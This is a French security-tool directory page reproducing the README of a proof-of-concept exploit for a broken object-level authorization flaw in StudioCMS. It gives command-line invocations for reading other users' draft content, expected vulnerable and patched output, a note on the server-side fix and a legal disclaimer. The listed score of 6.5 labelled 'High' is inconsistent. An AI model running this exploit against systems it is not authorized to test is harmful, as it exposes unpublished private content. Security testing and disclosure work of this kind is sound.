Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24134-PoC — Preuve de concept pour CVE-2026-24134, une vulnérabilité de niveau d'autorisation d'objet cassé (BOLA) dans StudioCMS, démontrant un accès non autorisé au contenu de brouillon. | Kitploit
Outils/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests de Sécurité des APITests d'IntrusionApprentissage et Éducation
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Preuve de concept pour CVE-2026-24134, une vulnérabilité de niveau d'autorisation d'objet cassé (BOLA) dans StudioCMS, démontrant un accès non autorisé au contenu de brouillon.

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24134-PoC

Aperçu

Ce dépôt contient la preuve de concept (PoC) pour CVE-2026-24134, une vulnérabilité de type Broken Object Level Authorization (BOLA) dans StudioCMS.

Contenu

  • cve_2026_24134_poc.py - Script d'exploitation en Python

Prérequis

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Démarrage rapide

Exploitation manuelle

root@kitploit:~
# Utilisation de base
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Enregistrer la sortie dans un fichier
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Tests automatisés

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Arguments

Requis

  • -u, --url - URL de base de StudioCMS cible
  • --uuid - UUID du contenu brouillon cible

Mode manuel

  • --username - Nom d'utilisateur pour l'authentification
  • --password - Mot de passe pour l'authentification

Mode de test automatisé

  • --auto-test - Activer les tests automatisés
  • --visitor-user - Nom d'utilisateur du compte visiteur
  • --visitor-pass - Mot de passe du compte visiteur
  • --editor-user - Nom d'utilisateur du compte éditeur
  • --editor-pass - Mot de passe du compte éditeur

Optionnel

  • --save - Enregistrer le contenu de la réponse dans un fichier
  • --no-ssl-verify - Désactiver la vérification du certificat SSL

Exemples de scénarios

Scénario 1 : Tester si le système est vulnérable

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Sortie attendue si vulnérable :

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Sortie attendue si corrigé :

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Scénario 2 : Extraire le contenu brouillon

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Cela enregistrera le contenu brouillon complet dans draft_{uuid}.html.

Comprendre la sortie

Indicateurs de succès

  • [+] - Opération réussie (vert)
  • [*] - Message informatif (bleu)
  • [!] - Avertissement (jaune)
  • [-] - Erreur (rouge)

Codes de statut HTTP

  • 200 OK - Vulnérable ! Contenu brouillon accessible
  • 403 Forbidden - Corrigé ! Autorisation appropriée en place
  • 404 Not Found - UUID invalide ou implémentation sécurisée (renvoie 404 au lieu de révéler l'existence)
  • 401 Unauthorized - Échec de l'authentification

Atténuation

Si vous exécutez une version vulnérable de StudioCMS, mettez à jour immédiatement vers la version corrigée.

Pour les développeurs

Le vrai problème : Les contrôles d'autorisation étaient effectués côté client (JavaScript), et non côté serveur.

Selon l'équipe de développement :

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

Le correctif : Déplacer l'autorisation du client vers le serveur.

Principe clé : Ne jamais faire confiance au client. La sécurité côté client = amélioration de l'expérience utilisateur. La sécurité côté serveur = protection réelle.

Avertissement légal

IMPORTANT : Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.

  • Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite
  • L'accès non autorisé à des systèmes informatiques est illégal dans la plupart des juridictions
  • L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil
  • Suivez toujours les pratiques de divulgation responsable

Références

  • CVE : CVE-2026-24134
  • CVSS : 6.5 High
  • CWE : CWE-639
  • OWASP : API1:2023 - Broken Object Level Authorization

Contact

Pour toute question concernant ce PoC ou la vulnérabilité :

  • Auteur : Filipe Gaudard

Licence

Ce PoC est publié à des fins éducatives. Utilisez-le de manière responsable et éthique.

Télécharger l’outil